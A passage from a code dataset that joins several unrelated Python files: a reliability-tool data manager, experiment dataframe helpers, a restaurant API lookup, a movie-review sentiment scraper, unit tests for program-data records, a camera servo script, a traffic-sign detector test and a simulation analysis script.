except DataAccessError as _error:\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error.msg,\n )\n pub.sendMessage(\n \"fail_insert_usage_profile\",\n error_message=_error.msg,\n )\n\n def _do_insert_mission_phase(self, mission_id: int) -> None:\n \"\"\"Add a new mission phase for mission ID.\n\n :param mission_id: the mission ID to add the new mission phase.\n :return: None\n :rtype: None\n \"\"\"\n try:\n _last_id = self.dao.get_last_id('ramstk_mission_phase', 'phase_id')\n _phase = RAMSTKMissionPhase()\n _phase.mission_id = mission_id\n _phase.phase_id = _last_id + 1\n\n self.dao.do_insert(_phase)\n\n _node_id = '{0:d}.{1:d}'.format(mission_id, _phase.phase_id)\n self.tree.create_node(tag='mission_phase',\n identifier=_node_id,\n parent=str(mission_id),\n data={'usage_profile': _phase})\n self.last_id['mission_phase'] = _phase.phase_id\n pub.sendMessage(\n 'succeed_insert_usage_profile',\n node_id=_node_id,\n tree=self.tree,\n )\n except DataAccessError as _error:\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error.msg,\n )\n pub.sendMessage(\n \"fail_insert_usage_profile\",\n error_message=_error.msg,\n )\n\n def _do_set_attributes(self, node_id: List, package: Dict) -> None:\n \"\"\"Set the attributes of the record associated with the Node ID.\n\n :param node_id: the ID of the record whose attributes are to be set.\n :param package: the key:value for the attribute being updated.\n :return: None\n :rtype: None\n \"\"\"\n [[_key, _value]] = package.items()\n\n try:\n _attributes = self.do_select(\n node_id[0], table='usage_profile').get_attributes()\n if _key in _attributes:\n _attributes[_key] = _value\n\n _level = len(node_id[0].split('.'))\n for _attribute in {\n 1: ['revision_id', 'mission_id'],\n 2: ['mission_id', 'phase_id'],\n 3: ['phase_id', 'environment_id'],\n }[_level]:\n _attributes.pop(_attribute)\n\n self.do_select(\n node_id[0],\n table='usage_profile').set_attributes(_attributes)\n\n except (AttributeError, TypeError) as _error:\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error,\n )\n pub.sendMessage(\n 'fail_set_usage_profile_attributes',\n node_id=node_id[0],\n )\n\n def _do_set_all_attributes(self, attributes: Dict[str, Any],\n node_id: str) -> None:\n \"\"\"Set all the attributes of the record associated with the Module ID.\n\n This is a helper function to set a group of attributes in a single\n call. Used mainly by the AnalysisManager.\n\n :param attributes: the aggregate attributes dict for the revision.\n :param node_id: the usage profile ID if the attribute being set\n is a usage profile (mission, mission phase, or environment)\n attribute.\n :return: None\n :rtype: None\n \"\"\"\n for _key in attributes:\n self._do_set_attributes(node_id=[node_id, ''],\n package={_key: attributes[_key]})\n","sub_path":"src/ramstk/controllers/usage_profile/datamanager.py","file_name":"datamanager.py","file_ext":"py","file_size_in_byte":14514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608046926","text":"import os\n\nimport pandas as pd\n\nfrom . import load\n\n\ndef construct_experiments_df(experiments_path):\n experiments_path = os.path.abspath(experiments_path)\n experiments_path_elems = [os.path.join(experiments_path, elem)\n for elem in os.listdir(experiments_path)]\n experiment_paths = [elem for elem in experiments_path_elems\n if os.path.isdir(elem) and is_experiment_dir(elem)]\n\n experiment_IDs = [os.path.basename(experiment_path)\n for experiment_path in experiment_paths]\n\n rows = [construct_experiment_row(experiment_path)\n for experiment_path in experiment_paths]\n\n return pd.DataFrame(data=rows, index=experiment_IDs)\n\n\ndef construct_experiment_row(experiment_path):\n json_names, json_files = zip(*[(\"\".join(elem.split(\".\")[:-1]), elem)\n for elem in os.listdir(experiment_path)\n if elem.endswith(\".json\")])\n json_paths = [os.path.join(experiment_path, json_file) for json_file in json_files]\n\n json_dicts = [load.open_json(json_path) for json_path in json_paths]\n\n experiment_row = {}\n for json_dict in json_dicts:\n experiment_row.update(json_dict)\n\n for json_name, json_path in zip(json_names, json_paths):\n experiment_row[json_name + \"_json\"] = json_path\n\n return experiment_row\n\n\ndef is_experiment_dir(dir):\n \"\"\"quick and dirty check\"\"\"\n return any([elem.endswith(\".json\") for elem in os.listdir(dir)])\n\n\ndef reconstruct_from_row(experiment_row, experiment_type=\"optimization\"):\n\n if experiment_type not in [\"optimization\", \"critfinder\"]:\n raise NotImplementedError(\"experiment_type {} not understood\"\n .format(experiment_type))\n\n if experiment_type == \"critfinder\":\n experiment_json_path = experiment_row.finder_json\n optimization_path = experiment_row.optimization_path\n optimization_row = pd.Series(construct_experiment_row(optimization_path))\n else:\n experiment_json_path = experiment_row.optimizer_json\n optimization_row = experiment_row\n\n data_json_path = optimization_row.data_json\n network_json_path = optimization_row.network_json\n\n data, network, experiment = load.from_paths(\n data_json_path, network_json_path, experiment_json_path,\n experiment_type=experiment_type)\n\n return data, network, experiment\n","sub_path":"critfinder/utils/dataframes.py","file_name":"dataframes.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"256959275","text":"import json\nimport requests\nimport pprint\nimport collections as cl\n#食べ物の情報をとってくる函数(ぐるなびAPI)\n#引数   fName:食べ物の名前\n#     fLat :現在地の緯度\n#     fLon :現在地の経度\n#return値 レストラン情報\ndef getFoodsInfo(fName,fLat,fLon):\n url = \"https://api.gnavi.co.jp/RestSearchAPI/v3/\"\n\n params={}\n params[\"keyid\"] = \"\"\n params[\"freeword\"] = fName\n params[\"latitude\"] = fLat\n params[\"longitude\"] = fLon\n\n #range=検索範囲の半径の大きさ(1~5) 10件以上見つかる最小の大きさを求める\n for i in range(1,6):\n params[\"range\"] = i\n result = requests.get(url, params)\n if(countHit(result.json())>=10):\n break\n\n print(\"range:%d\" % i)\n return result.json() \n\n#ヒット件数を求める函数.レスポンスがエラー時の処理も行う.\n#引数   restInfo:ぐるなびAPIが返したレストラン情報\n#return値 ヒット件数\ndef countHit(restInfo): \n return restInfo.get('total_hit_count', 0)\n\"\"\"\ndef countHitOld(restInfo): \n try:\n if(restInfo['rest']):\n hit=len(restInfo['rest'])\n else:\n hit=0\n except:\n #restInfo['rest']が読めないときエラーになる\n hit=0\n #print(restInfo['error'][0]['code'])print(restInfo['error'][0]['message'])\n \n return hit\"\"\"\n\n#取得結果を表示する\n#引数   restInfo:ぐるなびAPIが返したレストラン情報\n#return値 void\ndef printFoodsInfo(restInfo):\n hitCnt=countHit(restInfo)\n for i in range(hitCnt):\n if(restInfo['rest'][i]['address']):\n print(\"お店情報:%d件目 / 全%d件\" % (i+1,hitCnt) )\n print(restInfo['rest'][i]['address'])\n print(restInfo['rest'][i]['name'])\n \n\n\"\"\" \n #print(restInfo['rest'][i]['name_kana'])\n #print(restInfo['rest'][i]['opentime'])\n #print(restInfo['rest'][i]['image_url']['shop_image1'])\n #print(restInfo['rest'][i]['code']['areaname'])\n print(restInfo['rest'][i]['code']['category_name_l'][:2])\n print(\" ----------------------------------------- \")\n\"\"\"\nif __name__=='__main__':\n data=getFoodsInfo('たこ焼き',34.986086, 135.759089)\n printFoodsInfo(data)","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"40392855","text":"import requests # request a webpage\nimport bs4 # search tags in a HTML page\nfrom selenium import webdriver # download webpage after javascript rendering\n\nfrom nltk.tokenize import word_tokenize # separate text into words\nfrom nltk.corpus import stopwords # remove stopwords from text\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer # sentiment analysis\n\nfrom utils import print_progress_bar # display progress bar in console\n\n\n# STEP 0\ndef input_movie_name():\n \"\"\"\n Get movie name from user input\n \"\"\"\n movie_name = input('\\nEnter a movie to analyse people\\'s sentiment about it: ')\n print()\n return movie_name, len(movie_name) == 0\n\n\n# STEP 1\ndef search_movie_url(movie_name, base_url):\n \"\"\"\n Search movie URL in website\n Parameters:\n movie_name - Required : movie name inputted by user (Str)\n base_url - Required : website base URL (Str)\n Returns:\n movie_url : movie URL in website (Str)\n found : boolean indicating whether the movie was found (Bool)\n \"\"\"\n # Request search web page\n search_url = base_url + '/search?query=' + movie_name.replace(' ', '%20')\n print('Searching movie...')\n res = requests.get(search_url)\n res.raise_for_status()\n search_soup = bs4.BeautifulSoup(res.text, features='html.parser')\n\n # Search movie\n movie_search_results = search_soup.select('.flex a[data-media-type=\"movie\"]')\n if len(movie_search_results) == 0:\n print(\"Movie not found\")\n return '', False\n print('Movie found')\n\n # Get movie URL\n movie_result = movie_search_results[0]\n movie_url = base_url + movie_result.get('href')\n\n return movie_url, True\n\n\n# STEP 2\ndef print_movie_data(movie_url):\n \"\"\"\n Get movie webpage and print movie data\n Parameters:\n movie_url - Required : movie URL (Str)\n \"\"\"\n # Request movie HTML page\n print('Accessing movie webpage...\\n')\n res = requests.get(movie_url)\n res.raise_for_status()\n movie_soup = bs4.BeautifulSoup(res.text, features='html.parser')\n\n # Print some movie information\n title_tag = movie_soup.select('.title span a h2')[0]\n print('Movie title: ' + title_tag.getText())\n date_tag = movie_soup.select('.title span .release_date')[0]\n print('Release date: ' + date_tag.getText().replace('(','').replace(')',''))\n actors_tag = movie_soup.select('.top_billed ol li[class=\"card\"]')\n print('Main actors:')\n for i in range(min(3, len(actors_tag))):\n descendants = list(actors_tag[i].descendants)\n name = descendants[8]\n character = descendants[11]\n print(' - ' + name + ': ' + character)\n\n\n# STEP 3\ndef get_movie_reviews_webpage(movie_url):\n \"\"\"\n Get HTML tags (div) of all reviews\n Parameters:\n movie_url - Required : movie URL (Str)\n Returns:\n reviews_tags : HTML tags containing reviews (List of bs4.element.Tag)\n \"\"\"\n # Get movie reviews webpage\n reviews_url = movie_url + '/reviews'\n print('\\nAccessing movie reviews...')\n res = requests.get(reviews_url)\n res.raise_for_status()\n # Retrieve HTML tags\n reviews_soup = bs4.BeautifulSoup(res.text, features='html.parser')\n reviews_tags = reviews_soup.select('.review_container .content .inner_content .card .teaser')\n return reviews_tags\n\n\n# STEP 4\ndef check_reviews_number(reviews_tags):\n \"\"\"\n Check that there is a positive number of reviews\n Parameters:\n reviews_tags - Required : HTML tags containing reviews (List of bs4.element.Tag)\n Returns:\n positive : boolean indicating whether there is a positive number of reviews (Bool)\n \"\"\"\n if len(reviews_tags) == 0:\n print('No review found for this movie.')\n return False\n return True\n\n\n# STEP 5\ndef get_reviews_text(reviews_tags, base_url):\n \"\"\"\n Get text of reviews in their HTML tags\n Parameters:\n reviews_tags - Required : HTML tags containing reviews (List of bs4.element.Tag)\n base_url - Required : website base URL (Str)\n Returns:\n reviews : list containing text of each review (List of Str)\n \"\"\"\n # We may need selenium to retrieve some reviews\n options = webdriver.ChromeOptions()\n options.add_argument('headless')\n browser = webdriver.Chrome(options=options)\n\n reviews = []\n nb_reviews = len(reviews_tags)\n print('Analysis over ' + str(nb_reviews) + ' reviews')\n print_progress_bar(0, nb_reviews, prefix='Downloading reviews:', suffix='complete')\n\n for idx, tag in enumerate(reviews_tags):\n full_text = True\n text = ''\n # Check is the full review is displayed, or just a preview\n for desc in tag.descendants:\n if type(desc) == bs4.element.Tag and desc.name == 'a':\n # If not full, get page of full review with selenium\n full_text = False\n review_url = base_url + desc.get('href')\n browser.get(review_url)\n # Get div containing paragraphs of review\n paragraphs_div = browser.execute_script(\"return document.getElementsByClassName('content column pad')\")[0]\n div_children = paragraphs_div.find_elements_by_css_selector('*')\n # Concatenate paragraphs\n for p in div_children:\n if p.tag_name == 'p':\n text = text + p.text + ' '\n break\n if full_text:\n # If review is already full\n for desc in tag.descendants:\n # Retrieve all paragraphs of review and concatenate them\n if type(desc) == bs4.element.Tag and desc.name == 'p':\n text = text + desc.getText() + ' '\n # Add this review to the reviews list\n reviews.append(text.strip())\n print_progress_bar(idx+1, nb_reviews, prefix='Downloading reviews:', suffix='complete')\n\n return reviews\n\n\n# STEP 6\ndef clean_reviews_text(reviews):\n \"\"\"\n Clean reviews text data\n Parameters:\n reviews - Required : list containing text of each review (List of Str)\n Returns:\n reviews : modified list containing cleaned text of each review (List of Str)\n \"\"\"\n nb_reviews = len(reviews)\n print_progress_bar(0, nb_reviews, prefix='Cleaning data: ', suffix='complete')\n # Clean text data with NLTK library\n for idx, review in enumerate(reviews):\n print_progress_bar(idx+1, nb_reviews, prefix='Cleaning data: ', suffix='complete')\n tokens = word_tokenize(review)\n # Remove all tokens that are not alphabetic\n review = [word for word in tokens if word.isalpha()]\n # Filter out stopwords\n stop_words = set(stopwords.words('english'))\n review = [w for w in review if not w in stop_words]\n return reviews\n\n\n# STEP 7\ndef analyse_reviews_sentiment(reviews):\n \"\"\"\n Make sentiment analysis over reviews text data\n Parameters:\n reviews - Required : list containing text of each review (List of Str)\n Returns:\n sentiment_score : score in which positive values mean positive global sentiment\n and negative values mean negative global sentiment\n \"\"\"\n nb_reviews = len(reviews)\n print_progress_bar(0, nb_reviews, prefix='Analyzing reviews: ', suffix='complete')\n # Analyse sentiment with a lexicon\n sid = SentimentIntensityAnalyzer()\n sentiment_score = 0\n for idx, review in enumerate(reviews):\n print_progress_bar(idx+1, nb_reviews, prefix='Analyzing reviews: ', suffix='complete')\n ss = sid.polarity_scores(review)\n sentiment_score += ss['pos'] - ss['neg']\n print('\\n')\n return sentiment_score\n\n\n# STEP 8\ndef print_results(sentiment_score, threshold):\n \"\"\"\n Print result of reviews sentiment analysis according to the sentiment score\n Parameters:\n sentiment_score - Required : sentiment score computed over reviews text (Float)\n threshold - Required : threshold delimitating positive/negative scores\n from neutral score (Float)\n \"\"\"\n if sentiment_score > threshold:\n print('Global sentiment about this movie is positive')\n print(' --------')\n elif sentiment_score < -threshold:\n print('Global sentiment about this movie is negative')\n print(' --------')\n else:\n print('Global sentiment about this movie is neutral')\n print(' -------')\n","sub_path":"sentiment_analysis/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":8549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376868282","text":"\"\"\"Test reading and writing of program data.\"\"\"\n\nimport unittest\n\nfrom api import Api\nfrom core import *\nfrom cron import Cron\nimport unit_test_helper\n\n\nclass PdTestCase(unit_test_helper.PopulatedInconsistentTestCase):\n\n ### testing functions ###\n\n # See: http://docs.python.org/2/library/unittest.html#assert-methods\n\n def test_get_user_by_key(self):\n \"\"\"An example of a strongly consistent query.\"\"\"\n fetched_student = User.get_by_id(self.student.id)\n self.assertEqual(self.student, fetched_student)\n\n @unittest.expectedFailure\n def test_get_user_by_query(self):\n \"\"\"An example of an eventually consistent query.\"\"\"\n # A newly-created student won't be returned by a property-based query.\n new_student = User.create(user_type='student')\n new_student.put()\n fetched_student = User.all().filter('id =', new_student.id).get()\n self.assertEqual(new_student, fetched_student)\n\n def test_pd_variables_overwrite(self):\n \"\"\"A second pd with the same variable should delete the first.\"\"\"\n\n pd1 = self.student_api.create('pd', {\n 'variable': 'condition',\n 'value': 'first value',\n 'program': self.program.id,\n 'scope': self.student.id,\n })\n\n # In the process of creating this pd, the first should be deleted.\n pd2 = self.student_api.create('pd', {\n 'variable': 'condition',\n 'value': 'second value',\n 'program': self.program.id,\n 'scope': self.student.id,\n })\n \n # Re-fetch the original so we can see if it was correctly deleted.\n pd1 = Pd.get_by_id(pd1.id)\n self.assertTrue(pd1.deleted, \"Original pd not deleted.\")\n\n def test_pd_duplicates_overwrite(self):\n \"\"\"Even if there are duplicate pds, writing new ones should succeed.\"\"\"\n # Create w/o the api to intentionally create duplicates\n pd_id1 = 'Pd_1.' + self.student.id\n pd_id2 = 'Pd_2.' + self.student.id\n pd1 = Pd(key_name=pd_id1, id=pd_id1, parent=self.student,\n scope=self.student.id, program=self.program.id,\n variable='condition', value='duplicate test', public=True)\n pd2 = Pd(key_name=pd_id2, id=pd_id2, parent=self.student,\n scope=self.student.id, program=self.program.id,\n variable='condition', value='duplicate test', public=True)\n db.put([pd1, pd2])\n\n # Prove that there are duplicates.\n duplicates = self.student_api.get('pd', {}, ancestor=self.student)\n self.assertEquals(len(duplicates), 2)\n\n # Write a pd the normal way.\n pd3 = self.student_api.create('pd', {\n 'variable': 'condition',\n 'value': 'non-duplicate',\n 'program': self.program.id,\n 'scope': self.student.id,\n })\n\n # Only the new one should be present.\n non_duplicate = self.student_api.get('pd', {}, ancestor=self.student)\n self.assertEquals(len(non_duplicate), 1)\n self.assertEquals(non_duplicate[0].value, 'non-duplicate')\n\n def test_excessive_duplication(self):\n \"\"\"Writing over 100 duplicates raises an exception.\"\"\"\n # Create w/o the api to intentionally create duplicates\n duplicates = []\n for x in range(100):\n pd_id = 'Pd_{}.{}'.format(x, self.student.id)\n pd = Pd(key_name=pd_id, id=pd_id, parent=self.student,\n scope=self.student.id, program=self.program.id,\n variable='condition', value='duplicate test', public=True)\n duplicates.append(pd)\n db.put(duplicates)\n\n # Prove that there are duplicates.\n duplicates = self.student_api.get('pd', {}, ancestor=self.student)\n self.assertEquals(len(duplicates), 100)\n\n # Attempt to delete the excessive duplicates, expecting an exception.\n with self.assertRaises(Exception):\n pd_id = 'Pd_101.{}'.format(self.student.id)\n pd = Pd(key_name=pd_id, id=pd_id, parent=self.student,\n scope=self.student.id, program=self.program.id,\n variable='condition', value='non-duplicate', public=True)\n Pd.delete_previous_versions(pd, self.student)\n\n def test_batch_put_pd(self):\n params = {\n 'pd_batch': [{'variable': 's2__toi_1', 'value': 1},\n {'variable': 's2__toi_2', 'value': 1},\n {'variable': 's2__toi_3', 'value': 1},\n {'variable': 's2__toi_4', 'value': 1},\n {'variable': 's2__toi_5', 'value': 1},\n {'variable': 's2__toi_6', 'value': 1},\n {'variable': 's2__toi_7', 'value': 1},\n {'variable': 's2__toi_8', 'value': 1},\n {'variable': 's2__toi_9', 'value': 1},\n {'variable': 's2__toi_10', 'value': 1}],\n 'activity': self.student_activities[0].id,\n 'activity_ordinal': 1,\n 'program': self.program.id,\n 'scope': self.student.id,\n 'is_test': False,\n }\n self.student_api.batch_put_pd(params)\n\n # We should get all the data back, using a strongly consistent\n # ancestor query.\n results = Pd.all().ancestor(self.student).fetch(10)\n self.assertEqual(len(results), 10)\n for pd in results:\n self.assertTrue(isinstance(pd, Pd))\n\n def test_get_by_ancestor(self):\n \"\"\"Setting ancestor in api.get() should be strongly consistent.\"\"\"\n self.student_api.create('pd', {\n 'variable': 'consent',\n 'value': 'true',\n 'activity': self.student_activities[0].id,\n 'activity_ordinal': 1,\n 'program': self.program.id,\n 'scope': self.student.id,\n })\n\n inconsistent_results = self.student_api.get(\n 'pd', {'variable': 'consent'})\n consistent_results = self.student_api.get(\n 'pd', {'variable': 'consent'}, ancestor=self.student)\n\n self.assertEquals(len(inconsistent_results), 0)\n self.assertEquals(len(consistent_results), 1)\n\n def test_progress_pds_never_decrease_in_value(self):\n \"\"\"Progress pds lower in value than existing ones get written as\n deleted.\"\"\"\n\n kw = {\n 'variable': 's1__progress',\n 'activity': self.student_activities[0].id,\n 'activity_ordinal': 1,\n 'program': self.program.id,\n 'scope': self.student.id,\n }\n\n self.student_api.create('pd', dict(kw, **{'value': '50'}))\n\n # A pd in another program, or with a different variable shouldn't cause\n # any conflict.\n self.student_api.create('pd', dict(kw, **{'variable': 's2__progress',\n 'value': '100'}))\n self.student_api.create('pd', dict(kw, **{'program': 'fake_program',\n 'value': '100'}))\n\n # Putting a *higher* value should work.\n self.student_api.create('pd', dict(kw, **{'value': '70'}))\n higher_results = self.student_api.get(\n 'pd', {'variable': 's1__progress'}, ancestor=self.student)\n self.assertEquals(higher_results[0].value, '70')\n\n # Putting a *lower* value should not work.\n self.student_api.create('pd', dict(kw, **{'value': '60'}))\n higher_results = self.student_api.get(\n 'pd', {'variable': 's1__progress'}, ancestor=self.student)\n self.assertNotEquals(higher_results[0].value, '60')\n\n # Full history should be availabe.\n all_pd = Pd.all().filter('variable =', 's1__progress') \\\n .filter('program =', self.program.id) \\\n .ancestor(self.student) \\\n .order('created') \\\n .fetch(4)\n\n self.assertTrue(all_pd[0].deleted)\n self.assertFalse(all_pd[1].deleted)\n self.assertTrue(all_pd[2].deleted)\n\n self.assertEquals(all_pd[0].value, '50')\n self.assertEquals(all_pd[1].value, '70')\n self.assertEquals(all_pd[2].value, '60')\n","sub_path":"unit_testing/test_pd.py","file_name":"test_pd.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236117376","text":"import numpy as np\nimport cv2 \nfrom adafruit_servokit import ServoKit\n\nprint(cv2.__version__)\ndispW=1920\ndispH=1080\n#Uncomment These next Two Line for Pi Camera\ncamSet='nvarguscamerasrc ! video/x-raw(memory:NVMM), width=3264, height=2464, format=NV12, framerate=21/1 ! nvvidconv ! video/x-raw, width='+str(dispW)+', height='+str(dispH)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink'\nname= 'Raz'\n#camSet='nvarguscamerasrc sensor-id=-0 ! video/x-raw(memory:NVMM), width=3264, height=2464, framerate=21/1, format=NV12 ! nvvidconv flip-method=2 ! video/x-raw, width=800, height=600, format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink'\ncam= cv2.VideoCapture(camSet)\n#Or, if you have a WEB cam, uncomment the next line\n#(If it does not work, try setting to '1' instead of '0')\n#cam=cv2.VideoCaptur%e(0)\ni=1\nkit=ServoKit(channels=16)\n\ndef nothing(x):\n pass\n\ndef create_panTilt_trackbars():\n cv2.namedWindow('Trackbars')\n cv2.createTrackbar('Pan', 'Trackbars',90,180,nothing)\n cv2.createTrackbar('Tilt', 'Trackbars',90,180,nothing)\n cv2.moveWindow('Trackbars',1320,0)\n\ncreate_panTilt_trackbars()\n\n#Class camera for change position\nclass imxCamera:\n def __init__(self, pan , tilt):\n self.pan = pan\n self.tilt = tilt\n\n\n def changePosition(pan ,tilt):\n if pan > 180 or tilt > 180 or pan<0 or tilt<0:\n print(\"pan or tilt cannot be more than 180\")\n return 1\n kit.servo[0].angle = pan\n kit.servo[1].angle = tilt\n\n\nwhile True:\n pan = cv2.getTrackbarPos('Pan','Trackbars')\n tilt = cv2.getTrackbarPos('Tilt', 'Trackbars')\n ret, frame = cam.read()\n imxCamera.changePosition(pan,tilt)\n cv2.imshow('nanoCam',frame)\n\n if cv2.waitKey(1)==ord('p'):\n cv2.imwrite('/home/rami/Desktop/SmartCam/Pictures/known/'+str(i)+name+'.png',frame)\n i = i + 1\n if cv2.waitKey(1)==ord('q'):\n break\ncam.release()\ncv2.destroyAllWindows()\n","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363622683","text":"import argparse\nimport tensorflow as tf\nimport os\nimport sys\nimport numpy as np\nimport yaml\nfrom tqdm import tqdm\nfrom PIL import Image\nimport pickle\n\nfrom utils.trafficdata import createTraffBatchGenerator\nfrom utils.defaultboxes import generate_default_boxes\nfrom utils.boxutils import decode, computeNms\nfrom network.ssdnet import createSSD\nfrom network.ssdneteval import createSSD as createSSDEval\nfrom utils.imagevisualize import ImageVisualizer\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--data-dir', default='D:\\FAX\\MASTER\\LISADFG')\nparser.add_argument('--img-dir', default='TData2')\nparser.add_argument('--arch', default='ssd300')\nparser.add_argument('--num-examples', default=-1, type=int)\nparser.add_argument('--pretrained-type', default='specified')\nparser.add_argument('--checkpoint-dir', default='')\nparser.add_argument('--checkpoint-path', default=r\"D:\\FAX\\MASTER\\repo\\ssd_traffic_signs_detection\\checkpointsNewData\\ssd_epoch_70.h5\")\nparser.add_argument('--gpu-id', default='0')\n\nargs = parser.parse_args()\n\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n\nNUM_CLASSES = 247\nBATCH_SIZE = 1\n\ndef predict(ssd, imgs, default_boxes):\n confs, locs = ssd(imgs)\n\n\n confs = tf.squeeze(confs, 0)\n locs = tf.squeeze(locs, 0)\n\n confs = tf.math.softmax(confs, axis=-1)\n classes = tf.math.argmax(confs, axis=-1)\n scores = tf.math.reduce_max(confs, axis=-1)\n\n boxes = decode(default_boxes, locs)\n\n out_boxes = []\n out_labels = []\n out_scores = []\n\n for c in range(1, NUM_CLASSES):\n cls_scores = confs[:, c]\n\n score_idx = cls_scores > 0.6\n # cls_boxes = tf.boolean_mask(boxes, score_idx)\n # cls_scores = tf.boolean_mask(cls_scores, score_idx)\n cls_boxes = boxes[score_idx]\n cls_scores = cls_scores[score_idx]\n\n nms_idx = computeNms(cls_boxes, cls_scores, 0.45, 200)\n cls_boxes = tf.gather(cls_boxes, nms_idx)\n cls_scores = tf.gather(cls_scores, nms_idx)\n cls_labels = [c] * cls_boxes.shape[0]\n\n out_boxes.append(cls_boxes)\n out_labels.extend(cls_labels)\n out_scores.append(cls_scores)\n\n out_boxes = tf.concat(out_boxes, axis=0)\n out_scores = tf.concat(out_scores, axis=0)\n\n boxes = tf.clip_by_value(out_boxes, 0.0, 1.0).numpy()\n classes = np.array(out_labels)\n scores = out_scores.numpy()\n\n return boxes, classes, scores\n\ndef test_net():\n # with open(r\"D:\\FAX\\MASTER\\LISADFG\\classToIds.p\", 'rb') as f:\n # dataLoad = pickle.load(f)\n\n with open('./config.yml') as f:\n cfg = yaml.load(f)\n\n try:\n config = cfg[args.arch.upper()]\n except AttributeError:\n raise ValueError('Unknown architecture: {}'.format(args.arch))\n\n default_boxes = generate_default_boxes(config)\n batch_generator, info = createTraffBatchGenerator(args.data_dir,\n args.img_dir,\n default_boxes,\n config['image_size'],\n BATCH_SIZE,\n args.num_examples,\n augmentation=True,\n mode='test')\n\n try:\n ssd, latestEpoch = createSSD(NUM_CLASSES, args.arch,\n args.pretrained_type,\n args.checkpoint_dir,\n args.checkpoint_path)\n\n print('Latest epoch: {}'.format(latestEpoch))\n\n except Exception as e:\n print(e)\n print('The program is exiting...')\n sys.exit()\n\n os.makedirs('outputsMergeData/images', exist_ok=True)\n os.makedirs('outputsMergeData/detects', exist_ok=True)\n visualizer = ImageVisualizer(info['idx_to_name'], save_dir='outputsMergeData/images')\n\n for i, (filename, imgs, gt_confs, gt_locs) in enumerate(\n tqdm(batch_generator, total=info['length'],\n desc='Testing...', unit='images')):\n\n boxes, classes, scores = predict(ssd, imgs, default_boxes)\n\n filename = filename.numpy()[0].decode()\n original_image = Image.open(\n os.path.join(args.data_dir, info['image_dir'], filename))\n boxes *= original_image.size * 2\n visualizer.save_image(\n original_image, boxes, classes, '{}.jpg'.format(filename))\n\n log_file = os.path.join('outputsMergeData/detects', '{}.txt')\n\n for cls, box, score in zip(classes, boxes, scores):\n cls_name = info['idx_to_name'][cls]\n with open(log_file.format(cls_name), 'a') as f:\n f.write('{} {} {} {} {} {}\\n'.format(\n filename,\n score,\n *[coord for coord in box]))\n","sub_path":"script/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"82826408","text":"from starter2 import *\nfrom collections import defaultdict\nimport scipy\nimport colors\n\nimport convex_hull_tools as CHT\nimport hair_dryer\nimport otherones\nreload(hair_dryer)\nimport looper2\nimport three_loopers_tenfour as TL4\nif 'this_simname' not in dir():\n if 0:\n new_simname = 'a001'\n other_simname = 'u301'\n this_simname = 'u401'\n #save='a001_all_particles.h5'\n save='/data/cb1/Projects/P19_CoreSimulations/CoreSets/a000/a001_all_particles.h5'\n if 0:\n new_simname = 'a002'\n other_simname = 'u302'\n this_simname = 'u402'\n save='/data/cb1/Projects/P19_CoreSimulations/CoreSets/a000/a002_all_particles.h5'\n if 1:\n new_simname = 'a003'\n other_simname = 'u303'\n this_simname = 'u403'\n #save='a003_all_particles.h5'\n save='/data/cb1/Projects/P19_CoreSimulations/CoreSets/a000/a003_all_particles.h5'\n boxname = 'box_of_masses_%s.h5'%new_simname\n this_looper = looper2.core_looper2( directory = dl.sims[other_simname], savefile_only_trackage=save)\n print('make ms, takes about 90 sec')\n ms = trackage.mini_scrubber(this_looper.tr, 0, do_velocity=False)\n this_looper.ms = ms\n\n TL4.loops[this_simname].big_loop=this_looper\nsim_list=[this_simname]\n\nif 'ht' not in dir():\n ht={}\nfor this_simname in sim_list:\n if this_simname not in ht:\n ht[this_simname] = CHT.hull_tool(TL4.loops[this_simname])\n ht[this_simname].make_hulls()\n ht[this_simname].make_overlaps()\n\nif 'st' not in dir():\n import supersets\n reload(supersets)\n st={}\n for this_simname in sim_list:\n st[this_simname] = supersets.superset( TL4.loops[this_simname], ht[this_simname])\n st[this_simname].find()\n\nif 'new_looper' not in dir() :\n import otherones\n reload(otherones)\n print('make new one')\n\n core_list=None\n #core_list=np.unique(ht[this_simname].this_looper.tr.core_ids)\n\n for simname in sim_list:\n superset = None; name='has_neighbor'\n superset = st[simname]; name='no_neighbor'\n new_looper=otherones.find_other_ones(new_simname,ht[this_simname],core_list=core_list,superset=superset)\n outname = \"otherones_%s_%s_b.h5\"%(this_simname,name)\n if not os.path.exists(outname):\n print(\"SAVING FILE\", outname)\n tracks_read_write.save_loop_trackage_only( new_looper, outname)\n if not os.path.exists(boxname):\n new_looper.box.write(boxname)\n\n\n \nif 1:\n import otherones_hair\n reload(otherones_hair)\n core_loop = TL4.loops[this_simname]\n core_list=None\n #core_list =np.unique(ht[this_simname].this_looper.tr.core_ids)[:1]\n IM = otherones_hair.images(new_looper, core_loop)\n IM.run(frames=[0, core_loop.target_frame], core_list=core_list, output_prefix=this_simname)#,core_list=[3])\n #IM.run(frames=[0, core_loop.target_frame])#,core_list=[3])\n #IM.run(frames=[0,118])\n#hd = hair_dryer.hair_tool( this_looper 